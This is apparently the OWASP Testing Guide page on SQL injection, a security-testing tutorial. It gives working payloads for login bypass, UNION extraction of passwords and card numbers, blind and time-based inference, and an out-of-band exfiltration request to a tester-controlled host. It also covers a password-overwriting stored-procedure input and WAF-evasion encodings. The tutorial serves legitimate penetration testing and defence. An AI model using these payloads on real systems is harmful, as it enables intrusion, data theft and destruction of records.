## Summary

An [SQL injection](SQL_injection "wikilink") attack consists of
insertion or "injection" of either a partial or complete SQL query via
the data input or transmitted from the client (browser) to the web
application. A successful SQL injection attack can read sensitive data
from the database, modify database data (insert/update/delete), execute
administration operations on the database (such as shutdown the DBMS),
recover the content of a given file existing on the DBMS file system or
write files into the file system, and, in some cases, issue commands to
the operating system. SQL injection attacks are a type of [injection
attack](injection_attack "wikilink"), in which SQL commands are injected
into data-plane input in order to affect the execution of predefined SQL
commands.

In general the way web applications construct SQL statements involving
SQL syntax written by the programmers is mixed with user-supplied data.
Example:

    select title, text from news where id=$id

In the example above the variable $id contains user-supplied data, while
the remainder is the SQL static part supplied by the programmer; making
the SQL statement dynamic.

Because the way it was constructed, the user can supply crafted input
trying to make the original SQL statement execute further actions of the
user's choice. The example below illustrates the user-supplied data “10
or 1=1”, changing the logic of the SQL statement, modifying the WHERE
clause adding a condition “or 1=1”.

    select title, text from news where id=10 or 1=1

SQL Injection attacks can be divided into the following three classes:

  - Inband: data is extracted using the same channel that is used to
    inject the SQL code. This is the most straightforward kind of
    attack, in which the retrieved data is presented directly in the
    application web page.
  - Out-of-band: data is retrieved using a different channel (e.g., an
    email with the results of the query is generated and sent to the
    tester).
  - Inferential or Blind: there is no actual transfer of data, but the
    tester is able to reconstruct the information by sending particular
    requests and observing the resulting behavior of the DB Server.

A successful SQL Injection attack requires the attacker to craft a
syntactically correct SQL Query. If the application returns an error
message generated by an incorrect query, then it may be easier for an
attacker to reconstruct the logic of the original query and, therefore,
understand how to perform the injection correctly. However, if the
application hides the error details, then the tester must be able to
reverse engineer the logic of the original query.

About the techniques to exploit SQL injection flaws there are five
commons techniques. Also those techniques sometimes can be used in a
combined way (e.g. union operator and out-of-band):

  - Union Operator: can be used when the SQL injection flaw happens in a
    SELECT statement, making it possible to combine two queries into a
    single result or result set.
  - Boolean: use Boolean condition(s) to verify whether certain
    conditions are true or false.
  - Error based: this technique forces the database to generate an
    error, giving the attacker or tester information upon which to
    refine their injection.
  - Out-of-band: technique used to retrieve data using a different
    channel (e.g., make a HTTP connection to send the results to a web
    server).
  - Time delay: use database commands (e.g. sleep) to delay answers in
    conditional queries. It is useful when attacker doesn’t have some
    kind of answer (result, output, or error) from the application.

## How to Test

### Detection Techniques

The first step in this test is to understand when the application
interacts with a DB Server in order to access some data. Typical
examples of cases when an application needs to talk to a DB include:

  - Authentication forms: when authentication is performed using a web
    form, chances are that the user credentials are checked against a
    database that contains all usernames and passwords (or, better,
    password hashes).
  - Search engines: the string submitted by the user could be used in a
    SQL query that extracts all relevant records from a database.
  - E-Commerce sites: the products and their characteristics (price,
    description, availability, etc) are very likely to be stored in a
    database.

The tester has to make a list of all input fields whose values could be
used in crafting a SQL query, including the hidden fields of POST
requests and then test them separately, trying to interfere with the
query and to generate an error. Consider also HTTP headers and Cookies.

The very first test usually consists of adding a single quote (') or a
semicolon (;) to the field or parameter under test. The first is used in
SQL as a string terminator and, if not filtered by the application,
would lead to an incorrect query. The second is used to end a SQL
statement and, if it is not filtered, it is also likely to generate an
error. The output of a vulnerable field might resemble the following (on
a Microsoft SQL Server, in this case):

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
    character string ''.
    /target/target.asp, line 113

Also comment delimiters (-- or /\* \*/, etc) and other SQL keywords like
'AND' and 'OR' can be used to try to modify the query. A very simple but
sometimes still effective technique is simply to insert a string where a
number is expected, as an error like the following might be generated:

```
 Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'test' to a column of data type int.
/target/target.asp, line 113
```

Monitor all the responses from the web server and have a look at the
HTML/javascript source code. Sometimes the error is present inside them
but for some reason (e.g. javascript error, HTML comments, etc) is not
presented to the user. A full error message, like those in the examples,
provides a wealth of information to the tester in order to mount a
successful injection attack. However, applications often do not provide
so much detail: a simple '500 Server Error' or a custom error page might
be issued, meaning that we need to use blind injection techniques. In
any case, it is very important to test each field separately: only one
variable must vary while all the other remain constant, in order to
precisely understand which parameters are vulnerable and which are not.

### Standard SQL Injection Testing

#### Example 1 (classical SQL Injection):

Consider the following SQL query:

    SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A similar query is generally used from the web application in order to
authenticate a user. If the query returns a value it means that inside
the database a user with that set of credentials exists, then the user
is allowed to login to the system, otherwise access is denied. The
values of the input fields are generally obtained from the user through
a web form. Suppose we insert the following Username and Password
values:

    $username = 1' or '1' = '1

    $password = 1' or '1' = '1

The query will be:

    SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

If we suppose that the values of the parameters are sent to the server
through the GET method, and if the domain of the vulnerable web site is
www.example.com, the request that we'll carry out will be:

    http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

After a short analysis we notice that the query returns a value (or a
set of values) because the condition is always true (OR 1=1). In this
way the system has authenticated the user without knowing the username
and password.
*In some systems the first row of a user table would be an administrator
user. This may be the profile returned in some cases.* Another example
of query is the following:

    SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case, there are two problems, one due to the use of the
parentheses and one due to the use of MD5 hash function. First of all,
we resolve the problem of the parentheses. That simply consists of
adding a number of closing parentheses until we obtain a corrected
query. To resolve the second problem, we try to evade the second
condition. We add to our query a final symbol that means that a comment
is beginning. In this way, everything that follows such symbol is
considered a comment. Every DBMS has its own syntax for comments,
however, a common symbol to the greater majority of the databases is
/\*. In Oracle the symbol is "--". This said, the values that we'll use
as Username and Password are:

    $username = 1' or '1' = '1'))/*

    $password = foo

In this way, we'll get the following query:

    SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

(Due to the inclusion of a comment delimiter in the $username value the
password portion of the query will be ignored.)

The URL request will be:

    http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo

This may return a number of values. Sometimes, the authentication code
verifies that the number of returned records/results is exactly equal to
1. In the previous examples, this situation would be difficult (in the
database there is only one value per user). In order to go around this
problem, it is enough to insert a SQL command that imposes a condition
that the number of the returned results must be one. (One record
returned) In order to reach this goal, we use the operator "LIMIT
<num>", where <num> is the number of the results/records that we want to
be returned. With respect to the previous example, the value of the
fields Username and Password will be modified as follows:

    $username = 1' or '1' = '1')) LIMIT 1/*

    $password = foo

In this way, we create a request like the follow:

    http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo

#### Example 2 (simple SELECT statement):

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

Consider also the request to a script who executes the query above:

    http://www.example.com/product.php?id=10

When the tester tries a valid value (e.g. 10 in this case), the
application will return the description of a product. A good way to test
if the application is vulnerable in this scenario is play with logic,
using the operators AND and OR.

Consider the request:

    http://www.example.com/product.php?id=10 AND 1=2

    SELECT * FROM products WHERE id_product=10 AND 1=2

In this case, probably the application would return some message telling
us there is no content available or a blank page. Then the tester can
send a true statement and check if there is a valid result:

    http://www.example.com/product.php?id=10 AND 1=1

#### Example 3 (Stacked queries):

Depending on the API which the web application is using and the DBMS
(e.g. PHP + PostgreSQL, ASP+SQL SERVER) it may be possible to execute
multiple queries in one call.

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

A way to exploit the above scenario would be:

    http://www.example.com/product.php?id=10; INSERT INTO users (…)

This way is possible to execute many queries in a row and independent of
the first query.

### Fingerprinting the Database

Even though the SQL language is a standard, every DBMS has its
peculiarity and differs from each other in many aspects like special
commands, functions to retrieve data such as users names and databases,
features, comments line etc.

When the testers move to a more advanced SQL injection exploitation they
need to know what the back end database is.

1\) The first way to find out what back end database is used is by
observing the error returned by the application. The following are some
examples of error messages:

MySql:

    You have an error in your SQL syntax; check the manual
    that corresponds to your MySQL server version for the
    right syntax to use near '\'' at line 1

One complete UNION SELECT with version() can also help to know the back
end database.

```
 SELECT id, name FROM users WHERE id=1 UNION SELECT 1, version() limit 1,1
```

Oracle:

    ORA-00933: SQL command not properly ended

MS SQL Server:

    Microsoft SQL Native Client error ‘80040e14’
    Unclosed quotation mark after the character string

```
 SELECT id, name FROM users WHERE id=1 UNION SELECT 1, @@version limit 1, 1
```

PostgreSQL:

    Query failed: ERROR: syntax error at or near
    "’" at character 56 in /www/site/test.php on line 121.

2\) If there is no error message or a custom error message, the tester
can try to inject into string fields using varying concatenation
techniques:

MySql: ‘test’ + ‘ing’

SQL Server: ‘test’ ‘ing’

Oracle: ‘test’ | |’ing’

PostgreSQL: ‘test’ | |’ing’

### Exploitation Techniques

#### Union Exploitation Technique

The UNION operator is used in SQL injections to join a query, purposely
forged by the tester, to the original query. The result of the forged
query will be joined to the result of the original query, allowing the
tester to obtain the values of columns of other tables. Suppose for our
examples that the query executed from the server is the following:

    SELECT Name, Phone, Address FROM Users WHERE Id=$id

We will set the following $id value:

    $id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

We will have the following query:

    SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

Which will join the result of the original query with all the credit
card numbers in the CreditCardTable table. The keyword **ALL** is
necessary to get around queries that use the keyword DISTINCT. Moreover,
we notice that beyond the credit card numbers, we have selected two
other values. These two values are necessary because the two queries
must have an equal number of parameters/columns in order to avoid a
syntax error.

The first detail a tester needs to exploit the SQL injection
vulnerability using such technique is to find the right numbers of
columns in the SELECT statement.

In order to achieve this the tester can use ORDER BY clause followed by
a number indicating the numeration of database’s column selected:

    http://www.example.com/product.php?id=10 ORDER BY 10--

If the query executes with success the tester can assume, in this
example, there are 10 or more columns in the SELECT statement. If the
query fails then there must be fewer than 10 columns returned by the
query. If there is an error message available, it would probably be:

    Unknown column '10' in 'order clause'

After the tester finds out the numbers of columns, the next step is to
find out the type of columns. Assuming there were 3 columns in the
example above, the tester could try each column type, using the NULL
value to help them:

    http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--

If the query fails, the tester will probably see a message like:

    All cells in a column must have the same datatype

If the query executes with success, the first column can be an integer.
Then the tester can move further and so on:

    http://www.example.com/product.php?id=10 UNION SELECT 1,1,null--

After the successful information gathering, depending on the
application, it may only show the tester the first result, because the
application treats only the first line of the result set. In this case,
it is possible to use a LIMIT clause or the tester can set an invalid
value, making only the second query valid (supposing there is no entry
in the database which ID is 99999):

    http://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--

#### Boolean Exploitation Technique

The Boolean exploitation technique is very useful when the tester finds
a [Blind SQL Injection](Blind_SQL_Injection "wikilink") situation, in
which nothing is known on the outcome of an operation. For example, this
behavior happens in cases where the programmer has created a custom
error page that does not reveal anything on the structure of the query
or on the database. (The page does not return a SQL error, it may just
return a HTTP 500, 404, or redirect).

By using inference methods, it is possible to avoid this obstacle and
thus to succeed in recovering the values of some desired fields. This
method consists of carrying out a series of boolean queries against the
server, observing the answers and finally deducing the meaning of such
answers. We consider, as always, the www.example.com domain and we
suppose that it contains a parameter named id vulnerable to SQL
injection. This means that carrying out the following request:

    http://www.example.com/index.php?id=1'

We will get one page with a custom message error which is due to a
syntactic error in the query. We suppose that the query executed on the
server is:

    SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

Which is exploitable through the methods seen previously. What we want
to obtain is the values of the username field. The tests that we will
execute will allow us to obtain the value of the username field,
extracting such value character by character. This is possible through
the use of some standard functions, present in practically every
database. For our examples, we will use the following pseudo-functions:

**SUBSTRING (text, start, length)**: returns a substring starting from
the position "start" of text and of length "length". If "start" is
greater than the length of text, the function returns a null value.

**ASCII (char)**: it gives back ASCII value of the input character. A
null value is returned if char is 0.

**LENGTH (text)**: it gives back the number of characters in the input
text.

Through such functions, we will execute our tests on the first character
and, when we have discovered the value, we will pass to the second and
so on, until we will have discovered the entire value. The tests will
take advantage of the function SUBSTRING, in order to select only one
character at a time (selecting a single character means to impose the
length parameter to 1), and the function ASCII, in order to obtain the
ASCII value, so that we can do numerical comparison. The results of the
comparison will be done with all the values of the ASCII table, until
the right value is found. As an example, we will use the following value
for *Id*:

    $Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

That creates the following query (from now on, we will call it
"inferential query"):

    SELECT field1, field2, field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'

The previous example returns a result if and only if the first character
of the field username is equal to the ASCII value 97. If we get a false
value, then we increase the index of the ASCII table from 97 to 98 and
we repeat the request. If instead we obtain a true value, we set to zero
the index of the ASCII table and we analyze the next character,
modifying the parameters of the SUBSTRING function. The problem is to
understand in which way we can distinguish tests returning a true value
from those that return false. To do this, we create a query that always
returns false. This is possible by using the following value for *Id*:

    $Id=1' AND '1' = '2

Which will create the following query:

    SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'

The obtained response from the server (that is HTML code) will be the
false value for our tests. This is enough to verify whether the value
obtained from the execution of the inferential query is equal to the
value obtained with the test executed before. Sometimes, this method
does not work. If the server returns two different pages as a result of
two identical consecutive web requests, we will not be able to
discriminate the true value from the false value. In these particular
cases, it is necessary to use particular filters that allow us to
eliminate the code that changes between the two requests and to obtain a
template. Later on, for every inferential request executed, we will
extract the relative template from the response using the same function,
and we will perform a control between the two templates in order to
decide the result of the test.

In the previous discussion, we haven't dealt with the problem of
determining the termination condition for out tests, i.e., when we
should end the inference procedure. A techniques to do this uses one
characteristic of the SUBSTRING function and the LENGTH function. When
the test compares the current character with the ASCII code 0 (i.e., the
value null) and the test returns the value true, then either we are done
with the inference procedure (we have scanned the whole string), or the
value we have analyzed contains the null character.

We will insert the following value for the field *Id*:

    $Id=1' AND LENGTH(username)=N AND '1' = '1

Where N is the number of characters that we have analyzed up to now (not
counting the null value). The query will be:

    SELECT field1, field2, field3 FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1' = '1'

The query returns either true or false. If we obtain true, then we have
completed the inference and, therefore, we know the value of the
parameter. If we obtain false, this means that the null character is
present in the value of the parameter, and we must continue to analyze
the next parameter until we find another null value.

The blind SQL injection attack needs a high volume of queries. The
tester may need an automatic tool to exploit the vulnerability.

#### Error based Exploitation technique

An Error based exploitation technique is useful when the tester for some
reason can’t exploit the SQL injection vulnerability using other
technique such as UNION. The Error based technique consists in forcing
the database to perform some operation in which the result will be an
error. The point here is to try to extract some data from the database
and show it in the error message. This exploitation technique can be
different from DBMS to DBMS (check DBMS specific section).

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

Consider also the request to a script who executes the query above:

    http://www.example.com/product.php?id=10

The malicious request would be (e.g. Oracle 10g):

    http://www.example.com/product.php?id=10
    |
    |UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--

In this example, the tester is concatenating the value 10 with the
result of the function UTL_INADDR.GET_HOST_NAME. This Oracle function
will try to return the host name of the parameter passed to it, which is
other query, the name of the user. When the database looks for a host
name with the user database name, it will fail and return an error
message like:

    ORA-292257: host SCOTT unknown

Then the tester can manipulate the parameter passed to GET_HOST_NAME()
function and the result will be shown in the error message.

#### Out of band Exploitation technique

This technique is very useful when the tester find a [Blind SQL
Injection](Blind_SQL_Injection "wikilink") situation, in which nothing
is known on the outcome of an operation. The technique consists of the
use of DBMS functions to perform an out of band connection and deliver
the results of the injected query as part of the request to the tester’s
server. Like the error based techniques, each DBMS has its own
functions. Check for specific DBMS section.

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

Consider also the request to a script who executes the query above:

    http://www.example.com/product.php?id=10

The malicious request would be:

    http://www.example.com/product.php?id=10
    |
    |UTL_HTTP.request(‘testerserver.com:80’
    |
    |(SELECT user FROM DUAL)--

In this example, the tester is concatenating the value 10 with the
result of the function UTL_HTTP.request. This Oracle function will try
to connect to ‘testerserver’ and make a HTTP GET request containing the
return from the query “SELECT user FROM DUAL”. The tester can set up a
webserver (e.g. Apache) or use the Netcat tool:

    /home/tester/nc –nLp 80

    GET /SCOTT HTTP/1.1
    Host: testerserver.com
    Connection: close

#### Time delay Exploitation technique

The time delay exploitation technique is very useful when the tester
find a [Blind SQL Injection](Blind_SQL_Injection "wikilink") situation,
in which nothing is known on the outcome of an operation. This technique
consists in sending an injected query and in case the conditional is
true, the tester can monitor the time taken to for the server to
respond. If there is a delay, the tester can assume the result of the
conditional query is true. This exploitation technique can be different
from DBMS to DBMS (check DBMS specific section).

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

Consider also the request to a script who executes the query above:

    http://www.example.com/product.php?id=10

The malicious request would be (e.g. MySql 5.x):

    http://www.example.com/product.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--

In this example the tester is checking whether the MySql version is 5.x
or not, making the server to delay the answer by 10 seconds. The tester
can increase the delay time and monitor the responses. The tester also
doesn’t need to wait for the response. Sometimes he can set a very high
value (e.g. 100) and cancel the request after some seconds.

#### Stored Procedure Injection

When using dynamic SQL within a stored procedure, the application must
properly sanitize the user input to eliminate the risk of code
injection. If not sanitized, the user could enter malicious SQL that
will be executed within the stored procedure.

Consider the following **SQL Server Stored Procedure:**

```

Create procedure user_login @username varchar(20), @passwd varchar(20)
As
Declare @sqlstring varchar(250)
Set @sqlstring  = ‘
Select 1 from users
Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
exec(@sqlstring)
Go
```

User input:

    anyusername or 1=1'
    anypassword

This procedure does not sanitize the input, therefore allowing the
return value to show an existing record with these parameters.

NOTE: This example may seem unlikely due to the use of dynamic SQL to
log in a user, but consider a dynamic reporting query where the user
selects the columns to view. The user could insert malicious code into
this scenario and compromise the data.
Consider the following **SQL Server Stored Procedure:**

```

Create
procedure get_report @columnamelist varchar(7900)
As
Declare @sqlstring varchar(8000)
Set @sqlstring  = ‘
Select ‘ + @columnamelist + ‘ from ReportTable‘
exec(@sqlstring)
Go
```

User input:

    1 from users; update users set password = 'password'; select *

This will result in the report running and all users’ passwords being
updated.

#### Automated Exploitation

Most of the situation and techniques presented here can be performed in
a automated way using some tools. In this article the tester can find
information how to perform an automated auditing using SQLMap:

<https://www.owasp.org/index.php/Automated_Audit_using_SQLMap>

### SQL Injection signature Evasion Techniques

The techniques are used to bypass defenses such as Web application
firewalls (WAFs) or intrusion prevention systems (IPSs). Also refer to
<https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF>

#### White Space

Dropping space or adding spaces that won't affect the SQL statement. For
example

```
 or 'a'='a'
```

```
 or 'a'  =    'a'
```

Adding special character like new line or tab that won't change the SQL
statement execution. For example,

```

or
'a'=
      'a'
```

#### Null Bytes

Use null byte (%00) prior to any characters that the filter is blocking.

For example, if the attacker may inject the following SQL

    ' UNION SELECT password FROM Users WHERE username='admin'--

to add Null Bytes will be

    %00' UNION SELECT password FROM Users WHERE username='admin'--

#### SQL Comments

Adding SQL inline comments can also help the SQL statement to be valid
and bypass the SQL injection filter. Take this SQL injection as example.

    ' UNION SELECT password FROM Users WHERE name='admin'--

Adding SQL inline comments will be.

    '/**/UNION/**/SELECT/**/password/**/FROM/**/Users/**/WHERE/**/name/**/LIKE/**/'admin'--

    '/**/UNI/**/ON/**/SE/**/LECT/**/password/**/FROM/**/Users/**/WHE/**/RE/**/name/**/LIKE/**/'admin'--

#### URL Encoding

Use the online URL encoding to encode the SQL statement

<http://meyerweb.com/eric/tools/dencoder/>

    ' UNION SELECT password FROM Users WHERE name='admin'--

The URL encoding of the SQL injection statement will be

    %27%20UNION%20SELECT%20password%20FROM%20Users%20WHERE%20name%3D%27admin%27--

#### Character Encoding

Char() function can be used to replace English char. For example,
char(114,111,111,116) means root

    ' UNION SELECT password FROM Users WHERE name='root'--

To apply the Char(), the SQL injeciton statement will be

    ' UNION SELECT password FROM Users WHERE name=char(114,111,111,116)--

#### String Concatenation

Concatenation breaks up SQL keywords and evades filters. Concatenation
syntax varies based on database engine. Take MS SQL engine as an example

```
   select 1
```

The simple SQL statement can be changed as below by using concatenation

```
   EXEC('SEL' + 'ECT 1')
```

#### Hex Encoding

Hex encoding technique uses Hexadecimal encoding to replace original SQL
statement char. For example, 'root' can be represented as 726F6F74

```
      Select user from users where name = 'root'
```

The SQL statement by using HEX value will be:

```
      Select user from users where name = 726F6F74
```

or

```
      Select user from users where name = unhex('726F6F74')
```

#### Declare variables

Declare the SQL injection statement into variable and execute it.

For example, SQL injection statement below

```
   Union Select password
```

Define the SQL statement into variable SQLivar

```
 ; declare @SQLivar nvarchar(80); set @myvar = N'UNI' + N'ON' + N' SELECT' + N'password');
EXEC(@SQLivar)
```

\==== Alternative Expression of 'or 1 = 1' ====

  - OR 'SQLi' = 'SQL'+'i'
  - OR 'SQLi' \> 'S'
  - or 20 \> 1
  - OR 2 between 3 and 1
  - OR 'SQLi' = N'SQLi'
  - 1 and 1 = 1
  - 1

| | 1 = 1

  - 1 && 1 = 1

## Tools

  - SQL Injection Fuzz Strings (from wfuzz tool) -
    <https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/SQL.txt>
  - [OWASP SQLiX](:Category:OWASP_SQLiX_Project "wikilink")
  - Francois Larouche: Multiple DBMS SQL Injection tool - [SQL Power
    Injector](http://www.sqlpowerinjector.com/index.htm)
  - ilo--, Reversing.org -
    [sqlbftools](http://packetstormsecurity.org/files/43795/sqlbftools-1.2.tar.gz.html)
  - Bernardo Damele A. G.: sqlmap, automatic SQL injection tool -
    <http://sqlmap.org/>
  - icesurfer: SQL Server Takeover Tool -
    [sqlninja](http://sqlninja.sourceforge.net)
  - Pangolin: Automated SQL Injection Tool -
    [Pangolin](http://www.nosec.org/en/productservice/pangolin/)
  - Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool -
    <http://code.google.com/p/mysqloit/>
  - Antonio Parata: Dump Files by SQL inference on Mysql -
    [SqlDumper](http://sqldumper.ruizata.com/)
  - [bsqlbf, a blind SQL injection
    tool](https://code.google.com/p/bsqlbf-v2/) in Perl

## References

  - [Top 10 2013-A1-Injection](Top_10_2013-A1-Injection "wikilink")
  - [SQL Injection](SQL_Injection "wikilink")

Technology specific Testing Guide pages have been created for the
following DBMSs:

  - [Oracle](Testing_for_Oracle "wikilink")
  - [MySQL](Testing_for_MySQL "wikilink")
  - [SQL Server](Testing_for_SQL_Server "wikilink")

**Whitepapers**

  - Victor Chapela: "Advanced SQL Injection" -
    <http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt>
  - Chris Anley: "Advanced SQL Injection In SQL Server Applications" -
    <https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf>
  - Chris Anley: "More Advanced SQL Injection" -
    <http://www.encription.co.uk/downloads/more_advanced_sql_injection.pdf>
  - David Litchfield: "Data-mining with SQL Injection and Inference" -
    <http://www.databasesecurity.com/webapps/sqlinference.pdf>
  - Imperva: "Blinded SQL Injection" -
    <https://www.imperva.com/lg/lgw.asp?pid=369>
  - Ferruh Mavituna: "SQL Injection Cheat Sheet" -
    <http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/>
  - Kevin Spett from SPI Dynamics: "SQL Injection" -
    <https://docs.google.com/file/d/0B5CQOTY4YRQCSWRHNkNaaFMyQTA/edit>
  - Kevin Spett from SPI Dynamics: "Blind SQL Injection" -
    <http://www.net-security.org/dl/articles/Blind_SQLInjection.pdf>
  - "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan": "Beyond
    SQLi: Obfuscate and Bypass" -
    <https://www.exploit-db.com/papers/17934/>
  - Adi Kaploun and Eliran Goshen, Check Point Threat Intelligence &
    Research Team: "The Latest SQL Injection Trends" -
    <http://blog.checkpoint.com/2015/05/07/latest-sql-injection-trends/>

**Documentation on SQL injection vulnerabilities in products**

  - [Anatomy of the SQL injection in Drupal's database comment filtering
    system
    SA-CORE-2015-003](https://www.vanstechelman.eu/content/anatomy-of-the-sql-injection-in-drupals-database-comment-filtering-system-sa-core-2015-003)